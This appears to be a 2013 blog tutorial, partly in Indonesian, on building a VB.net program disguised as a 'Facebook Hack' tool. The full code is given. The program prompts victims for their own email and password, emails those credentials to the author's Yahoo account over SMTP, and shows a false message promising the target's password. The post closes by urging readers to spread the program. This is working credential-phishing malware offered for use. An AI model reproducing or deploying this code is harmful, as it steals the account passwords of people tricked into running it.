Wednesday 17 July 2013

Make Facebook Phisher ( VB.net )



How to : Make Facebook Phisher ( VB.net ) – Hi, Guys :) Happy Ramadan  Mubarak to my muslim friends. today i’m going to Post How to make Facebook Phisher in VB.net but actually this is an All-In-One Phisher  :troll .  ok lets go to the tutorial .

How to  Make Facebook Phisher in VB.net


Requires :

1. Visual Basic 2010 or Later

2. Computer

3. This post

Preparation :

ok Create New Project and make / Buat Project Baru dan buat :

1. TextBox1 ( Text “Your E-mail Address” ), TextBox2 ( Text ” Your Password” )  and TextBox3 ( Text “Your Target ,e.g gay@yahoo.com” ) .






2. Button1 ( Text “Hack!” ) and Button2 ( Text “Exit” ) .





3.Form1 ( Title or Text is “Facebook Hack 2013” :troll ).

1.) Ok now . double click Form1 and Above Public Class Form1 Type this code / klik 2 kali Form1 dan taruh Code ini di atas Public Class Form1



Imports System.Net.Mail
Imports Microsoft.Win32






2.) Double Click Button1 ( Hack! ) / Klik Dua kali Button1 ( Hack1 ).




And Type



Dim MyMailMessage As New MailMessage
 MyMailMessage.From = New MailAddress("YourYahooEmail")
 MyMailMessage.To.Add("YourYahooEmail")
 MyMailMessage.Body = ("Username: " + TextBox1.Text & vbCrLf & "Password: " + TextBox2.Text & vbCrLf & vbCrLf & "target: " + TextBox3.Text)
 Dim SMTPServer As New SmtpClient("smtp.yahoo.com.au")
 SMTPServer.Port = 587
 SMTPServer.Credentials = New System.Net.NetworkCredential("YourYahooEmail", "YourYahooPassword")
 SMTPServer.EnableSsl = False
 SMTPServer.Send(MyMailMessage)
 MsgBox("Passwords of your target generated in 24 hours ,please be patien . ill send the password to your e-mail address using your info!")

3.) Double Click Button2 ( Exit ) and type / Klik dua kali Button2 ( exit ) dan ketik :



End

4.) click Debug and Click Build / Klik Debug dan klik build. your Compiled Facebook Phisher Located at C:\Users\PCuserName\Documents\Visual Studio 2010\Projects\Facebook\Facebook\bin\Release ( facebook is my project name ). / Facebook Phisher yang sudah di Compile berlokasi di C:\Users\PCuserName\Documents\Visual Studio 2010\Projects\Facebook\Facebook\bin\Release

5.) Spread your Facebook Phisher and Do some troll :troll / Sebarkan Facebook Phishernya ke manusia alay :v .

 Hope You Love it :)

No comments:

Post a Comment